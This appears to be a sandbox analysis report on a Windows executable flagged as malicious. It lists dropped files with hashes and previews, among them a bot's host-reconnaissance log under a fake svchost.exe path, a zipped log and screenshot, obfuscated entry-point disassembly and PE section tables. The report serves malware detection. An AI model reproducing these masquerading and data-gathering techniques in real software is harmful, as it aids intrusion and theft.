                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):4.802925647778009
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                          MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                          SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                          SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                          SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):593
                                                                                                                                                                                                          Entropy (8bit):4.470551863591405
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                          MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                          SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                          SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                          SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (10731), with CRLF, LF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):43413
                                                                                                                                                                                                          Entropy (8bit):6.060996620549828
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:CiBtrifZVO7Wg3hIBY6yXY7JXOmuzrVuzQuzuuz2uzxUJ0GyIdiGPtYbcq:C8Cg3RkFONr0+ZPtYbcq
                                                                                                                                                                                                          MD5:FEAAF33F2A7D4FCF9F3DC477FA12DCBC
                                                                                                                                                                                                          SHA1:FEC1E98ABEF4485471B066AA7D21C46AD4AB236E
                                                                                                                                                                                                          SHA-256:E15D6F44762E9DF7916974B85015266DCF1D29E806AF357967A9C12861595DCA
                                                                                                                                                                                                          SHA-512:95463A01038895942B6CBD4BB529BA6E362ACCBE3D14BAF19AD3055BCB7A9275FED3002B15CBC8EB5F7112A6360BCF1E187EC0772316734ADB03B81C9DE5459E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html>..<head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">.. <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):162
                                                                                                                                                                                                          Entropy (8bit):4.43530643106624
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                                                                                                                                                                                                          MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                                                                                                                                                                                                          SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                                                                                                                                                                                                          SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                                                                                                                                                                                                          SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):173
                                                                                                                                                                                                          Entropy (8bit):4.43096450882803
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                          MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                          SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                          SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                          SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):52175
                                                                                                                                                                                                          Entropy (8bit):7.845224460713523
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:ROUR/+wXalJ+/OBjlsabpQMNflCcV0cZnb5M5ZXXnM5eH9E:RgYoIm3swQwd0c5e5gedE
                                                                                                                                                                                                          MD5:01A727F95414E3982650866DE770EF1C
                                                                                                                                                                                                          SHA1:501057B6892123B85F4C473DE9B7703B62E54F4E
                                                                                                                                                                                                          SHA-256:217F15D121FB419C94AA05C597FD76F3C28972AE34796B8A41540DAD9DED1D2B
                                                                                                                                                                                                          SHA-512:78B9CF316F828EA18BD83A1763390679A9DDE2AB7CB0852BA1E9250784DB56071D5E2B281968FD0C88C6BB8467E135C8A9C47BD2BF2070F3064A3DDD65FFC872
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:PK........:ckY...^;...........debug_11;Nov;2024_12;31;11.logUT...................0........@..z...Ee.6.ZUB..xX.u..1.......@i}.........M..Y!...T.......L.bS-.].!w..g...t.....q....z@.w..5M.&.O,,8.V...Y...J..T...0.B.Bj..!.Y...........:c...M.G....y....p\..$.Qc.C.*.V.Y....8v8..|B..T.Ev.%.e.....0$y...v....7.]...|...X3.Qb-_e..w........L..O_....S..{..ez.z.n i..G.3t;..P..{.u..q.T;.."...|.(..h...s..y)@..F.....>".<...q.=.=..%Cq..V..f..Y...l.v..kP.p...&.....\.*?.4...L~...0.OLr.-...?....U&S.'gi............j-..cuEM7..X.]/>{iu.;..........J.L.F.y.@..`........~..O...K.......U8...tz7.O..p"3=_..>Qkp1Q.1.........A`..=.....'......(-.?B&...PK........:ckYv..$2...6.......scr.bmpUT................._...'.R.6.!a\.....3..e0.......U.t..6+.W.%.m..no>..c....;.L....h...m...]..f..5....@.v.....DJ.Y&..L.....s..9..d..F|.%%.`0H..O.~.8.......;<...N....g.....h./..Nz<..:..y..?....._............:..;~.......;.....-.KWv.........w.~...:..u...t..t......._..........^C.......D.............O.
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1806
                                                                                                                                                                                                          Entropy (8bit):5.3568589413329635
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:uXGoLQyTyU0zc2i2LuiVGXZVV7RY6f6yZsosrOYXfVRXJsVRXDc3xw1zVbUlnX93:ulTudPSF9Xy/rJ+DAxw150nX7nN
                                                                                                                                                                                                          MD5:5DFA88ADF4CAE900D2FEFE402C98B9FF
                                                                                                                                                                                                          SHA1:756DD45365A3184065C197110E6CE325A03EAD12
                                                                                                                                                                                                          SHA-256:789933808AED6759C643D44B6C24D198CBBFFA7A39C7B5DF7D6025BF721AE30D
                                                                                                                                                                                                          SHA-512:29B7FA094F7E127DB194AA437606AB0AD720D3B805D4D692203EF735FF86A4D86C197D49EA9531381866D5459412135A7E162ACEE517F084528A06244B4107DD
                                                                                                                                                                                                          Malicious:false
Preview:
    ExceptionAddress = C:\Windows\System32\KERNELBASE.dll!RaiseException + 0x0062
    ExceptionCode = 0x0000071A
    Last error: 0x00000000
    Context:
    Eip = 0x768BCC12 Eax = 0x07C3F8E8 Ebx = 0x00000000
    Ecx = 0x00000000 Edx = 0x00368000 Ebp = 0x07C3F940
    Esp = 0x07C3F8E8 Esi = 0x0000071A Edi = 0x032CF8D8
    EFlags = 0x00000246
    Main module:
    main 0x02C70000-0x00061000
    ThreadStart = unknown!0x02c85590
    CallStack:
    C:\Windows\System32\RPCRT4.dll!RpcRaiseException + 0x003e
    C:\Windows\System32\RPCRT4.dll!RpcErrorGetNextRecord + 0x0461
    C:\Windows\System32\RPCRT4.dll!NdrAsyncClientCall + 0x04ea
    C:\Windows\System32\RPCRT4.dll!NdrAsyncClientCall + 0x0553
    C:\Windows\System32\RPCRT4.dll!RpcAsyncCompleteCall + 0x002c
    C:\Windows\SYSTEM32\WINSTA.dll!WinStationRegisterConsoleNotification + 0x0422
    C:\Windows\SYSTEM32\WINSTA.dll!WinStationQueryCurrentSessionInformation + 0x007a
    C:\Windows\System32\RPCRT4.dll!I_RpcGetSystemHandle + 0x0ba5
    C:\Windows\System32\RPCRT4.dll!I_RpcGetSystemHandle + 0x0b3d
    C:\Windows\System32\R
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 8, image size 1310720, cbSize 1311798, bits offset 1078
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1311798
                                                                                                                                                                                                          Entropy (8bit):2.9790941969800033
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24576:ncsN2K/9fOmGj82VwYV+AyYMXNNgIJTfq6uxErJX6oKoOoSX5DnUGJCtjyk9Bc3T:ncsN2K/9fOmGj82VwYV+AyYMXNNgIJT4
                                                                                                                                                                                                          MD5:C994D4A5288C688DF7FF12B6716EFDDB
                                                                                                                                                                                                          SHA1:42ADE890D84F8467B5B6E088133134319CFAA329
                                                                                                                                                                                                          SHA-256:7E2B405112E258B6B526FC24285652BD58F981278D227FBAA25CB8554F3B4786
                                                                                                                                                                                                          SHA-512:96C04265DDC81A7043BA3397DF0B8582B35EE8F9476C4CC59D582E475315B720F73977C26512792C4559835C6A60F7C6A13656CC5E0B3EA9837AC05C5E6CA48F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7190
                                                                                                                                                                                                          Entropy (8bit):5.184922652203559
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:/UCyRgBZYV8wWyFHHOp33yKWK2Yp2C771Aezexxuv0lTpA6kxMNSBDQfm7r2w6EO:/+cpPZ1BMZhP2sZA/lkb
                                                                                                                                                                                                          MD5:79B2D81DF9790EC9E0108FEEC2EADE12
                                                                                                                                                                                                          SHA1:0C9F3785C791936D946CEB4E69139A1EFEFB074B
                                                                                                                                                                                                          SHA-256:7DC505FCB5DB8C3FA8022A5654E3675A1A1097A85EA96FA845DC2C45EF3DAFC5
                                                                                                                                                                                                          SHA-512:D5D3CCA0EA10597A4E9AA8EC9ACB09BA87E719D72A72C810EB1FF580079B15780766EF378ACE26B072AE6C0A904FFFD59754C75E4287DC6DF54F5E22FE314DBB
                                                                                                                                                                                                          Malicious:false
Preview:
    {BotVer: 4.0.1}
    {Process: C:\Windows\apppatch\svchost.exe}
    {Username: user}
    {Processor: Intel64 Family 6 Model 143 Stepping 8, GenuineIntel}
    {Language: ENG}
    {Screen: 1280x1024@32}
    {Date: 11:Nov:2024}
    {Local time: 12:31:11}
    {GMT: -5:00}
    {Uptime: 0d 1h 30m}
    {Windows directory: C:\Windows}
    {Administrator: true}
    IE history:
    {http://go.microsoft.com/fwlink/p/?LinkId=255141}
    netstat
    {Proto  Local address      Remote address    State
    TCP    0.0.0.0:135        0.0.0.0:0         LISTEN
    TCP    0.0.0.0:445        0.0.0.0:0         LISTEN
    TCP    0.0.0.0:5040       0.0.0.0:0         LISTEN
    TCP    0.0.0.0:14332      0.0.0.0:0         LISTEN
    TCP    0.0.0.0:49664      0.0.0.0:0         LISTEN
    TCP    0.0.0.0:49665      0.0.0.0:0         LISTEN
    TCP    0.0.0.0:49666      0.0.0.0:0         LISTEN
    TCP    0.0.0.0:49667      0.0.0.0:0         LISTEN
    TCP    0.0.0.0:49668      0.0.0.0:0         LISTEN
    TCP    0.0.0.0:49669      0.0.0.0:0         LISTEN
    TCP    0.0.0.0:49670      0.0.0.0:0         LISTEN
    TCP    0.0.0.0:64111      0.0.0.0:0         LISTEN
    TCP    192.168.2.8:139    0.0.0.0:0         LISTEN
    TCP    192.168.2.8:49311  1.1.1.1:53        TIME_WAIT
    TCP    192.168.2.8:49702  192.168.2.1:445   ESTAB
    TCP    192.168.2.8:49703  23.206.229.226:
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\WlCVLbzNph.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                          Size (bytes):210432
                                                                                                                                                                                                          Entropy (8bit):7.831246470336783
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:77VD4DUHnNZkfOP6sfIOpJ9C3hPlGxt1UhRkgyankTIzfwAYzWcXCyqT36zhRRKy:1zHnMLm5GNGxHUhtnkdpHqTKzhh8i
                                                                                                                                                                                                          MD5:7F7F85F214F3A6B27A5B5FF8F6EC6188
                                                                                                                                                                                                          SHA1:88A754B4E31D3FCED3D73ECA0EF9C42949CEA89B
                                                                                                                                                                                                          SHA-256:CB96B6711EFDB2F5C7717F611C978ED611C54CC0970DEA7C37C628147902739C
                                                                                                                                                                                                          SHA-512:485BE8392879FBC3A3FE1E1E591663D959E0109E4AE143085CCC0FC581E6A22E9D30EF0D2ED069DC2995D028DFBD6FBB134E4904502798264A548890E892910F
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\WlCVLbzNph.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:true
Preview:
    [ZoneTransfer]
    ZoneId=0
                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Entropy (8bit):7.831241949879198
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                          File name:WlCVLbzNph.exe
                                                                                                                                                                                                          File size:210'432 bytes
                                                                                                                                                                                                          MD5:bb4d08026f4dad460862be3d65fbeddb
                                                                                                                                                                                                          SHA1:2caf9f151b88a328475181b2ecce22f90694795f
                                                                                                                                                                                                          SHA256:7ef95304b8e240cba2fddbc90e13d5e8fead7dd65c6c2cddc0e11af14198703b
                                                                                                                                                                                                          SHA512:6f73ee62eabf33c0c9eabb09921c48f1be4d3c5eea9251d2ffbb745be8bff879b7b5ad8289a1aaafbc24a1df2fd98fd8a5d45ea5ca3c5b2e5209d119e8948e81
                                                                                                                                                                                                          SSDEEP:3072:m7VD4DUHnNZkfOP6sfIOpJ9C3hPlGxt1UhRkgyankTIzfwAYzWcXCyqT36zhRRKy:szHnMLm5GNGxHUhtnkdpHqTKzhh8i
                                                                                                                                                                                                          TLSH:33241206B59B418AC90A19B384FF77142BA87DDD1322D33F4E745EFA2CD60A93872984
                                                                                                                                                                                                          Icon Hash:004ab5b5d5b59535
                                                                                                                                                                                                          Entrypoint:0x401b3b
                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                          DLL Characteristics:
                                                                                                                                                                                                          Time Stamp:0x3A11222E [Tue Nov 14 11:29:50 2000 UTC]
                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                          Import Hash:616d060f84174fbe550615d295f4ce51
                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                          mov ecx, 00000000h
                                                                                                                                                                                                          mov eax, ecx
                                                                                                                                                                                                          call dword ptr [004150F8h]
                                                                                                                                                                                                          mov dword ptr [00424B42h], eax
                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                          xor ebx, ebx
                                                                                                                                                                                                          sub ebx, 0000010Ah
                                                                                                                                                                                                          jnc 00007F3D20E2EEE8h
                                                                                                                                                                                                          add ebx, 00000D32h
                                                                                                                                                                                                          mov ecx, ebx
                                                                                                                                                                                                          shr ecx, 1
                                                                                                                                                                                                          add ecx, esi
                                                                                                                                                                                                          sub ecx, 00000222h
                                                                                                                                                                                                          ror ecx, 05h
                                                                                                                                                                                                          sub ecx, dword ptr [00425025h]
                                                                                                                                                                                                          sub ecx, eax
                                                                                                                                                                                                          sub dword ptr [00424AEDh], ecx
                                                                                                                                                                                                          shr ecx, 1
                                                                                                                                                                                                          add dword ptr [004250ADh], ecx
                                                                                                                                                                                                          call 00007F3D20E2FC34h
                                                                                                                                                                                                          mov dword ptr [00424377h], eax
                                                                                                                                                                                                          push 00000001h
                                                                                                                                                                                                          pop edx
                                                                                                                                                                                                          push edx
                                                                                                                                                                                                          mov ecx, 00486F5Ah
                                                                                                                                                                                                          mov ebp, 00071E7Eh
                                                                                                                                                                                                          mov eax, ebp
                                                                                                                                                                                                          sub ecx, eax
                                                                                                                                                                                                          call dword ptr [ecx]
                                                                                                                                                                                                          mov dword ptr [00424170h], eax
                                                                                                                                                                                                          mov esi, 0020A87Ch
                                                                                                                                                                                                          mov eax, esi
                                                                                                                                                                                                          shl eax, 1
                                                                                                                                                                                                          call dword ptr [eax]
                                                                                                                                                                                                          mov dword ptr [0042424Eh], eax
                                                                                                                                                                                                          or eax, eax
                                                                                                                                                                                                          jne 00007F3D20E2EEE5h
                                                                                                                                                                                                          mov edx, esi
                                                                                                                                                                                                          dec edi
                                                                                                                                                                                                          mov edi, 00000001h
                                                                                                                                                                                                          mov eax, edi
                                                                                                                                                                                                          push eax
                                                                                                                                                                                                          mov ecx, 0020A86Ah
                                                                                                                                                                                                          mov eax, ecx
                                                                                                                                                                                                          shl eax, 1
                                                                                                                                                                                                          call dword ptr [eax]
                                                                                                                                                                                                          mov dword ptr [00425205h], eax
                                                                                                                                                                                                          ret
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          mov eax, ebp
                                                                                                                                                                                                          push eax
                                                                                                                                                                                                          push esp
                                                                                                                                                                                                          pop ebp
                                                                                                                                                                                                          sub esp, 14h
                                                                                                                                                                                                          lea eax, dword ptr [004245CCh]

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x15204 | 0xb4 | .N
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5f000 | 0x29434 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x89000 | 0x3fe | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1b514 | 0x1c | .fc
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x305b | 0x3200 | 746849c22bd1df3ec913e6afd3261c01 | False | 0.700703125 | data | 6.211906712870064 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.j | 0x5000 | 0x6b23 | 0x600 | 0ac67a98e2d3f6254b28e45da115c69b | False | 0.96875 | data | 7.160260489225009 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.nkytZ | 0xc000 | 0x8a0b | 0x400 | a47b6a356a3431ac9df3442ebc526efb | False | 0.728515625 | data | 5.978528077403749 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.N | 0x15000 | 0x5168 | 0xe00 | 1dbd683313ed000c6b75f32744694ec5 | False | 0.47572544642857145 | data | 5.278775089069264 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fc | 0x1b000 | 0x8d26 | 0x600 | 12c7d10915b83bfd9faa65fa82180001 | False | 0.736328125 | data | 5.748360690216942 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data | 0x24000 | 0x36c0 | 0x3800 | 9a257e09d714d8ab48b690e8453afbd6 | False | 0.81298828125 | data | 6.7672572781458635 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.s | 0x28000 | 0x65bb | 0x800 | 30f797c52e34fe45fded3dfd0de177a6 | False | 0.2587890625 | data | 2.075341234110115 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.w | 0x2f000 | 0x2fd0b | 0x800 | 1958d4f52ae8d506c6908df58c4a3a64 | False | 0.6533203125 | data | 5.386043783353626 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x5f000 | 0x29434 | 0x29600 | 496540dfc12657aab2ce18ca319f7ae5 | False | 0.9770404550604229 | data | 7.967828924738939 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x89000 | 0x3fe | 0x400 | a91b09921b19daa6e0bdbe6b0aaccf90 | False | 0.939453125 | data | 6.753512294366748 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x5f310 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4143996247654784
RT_DIALOG | 0x603b8 | 0x50 | data | English | United States | 1.0
RT_STRING | 0x60408 | 0x11a | data | English | United States | 0.7304964539007093
RT_STRING | 0x60524 | 0x114 | data | English | United States | 0.7282608695652174
RT_STRING | 0x60638 | 0x10c | data | English | United States | 0.7388059701492538
RT_STRING | 0x60744 | 0x154 | data | English | United States | 0.6970588235294117
RT_STRING | 0x60898 | 0x11a | Targa image data - Color 2 x 55 x 32 +42 +86 "\011" | English | United States | 0.7269503546099291
RT_STRING | 0x609b4 | 0x16e | data | English | United States | 0.6857923497267759
RT_STRING | 0x60b24 | 0x132 | data | English | United States | 0.7124183006535948
RT_STRING | 0x60c58 | 0xfe | data | English | United States | 0.7480314960629921
RT_RCDATA | 0x60d58 | 0x27493 | data | English | United States | 1.0003480098188484
RT_GROUP_ICON | 0x881ec | 0x14 | data | English | United States | 1.1
RT_VERSION | 0x88200 | 0x234 | data | English | United States | 0.5336879432624113

DLL | Import
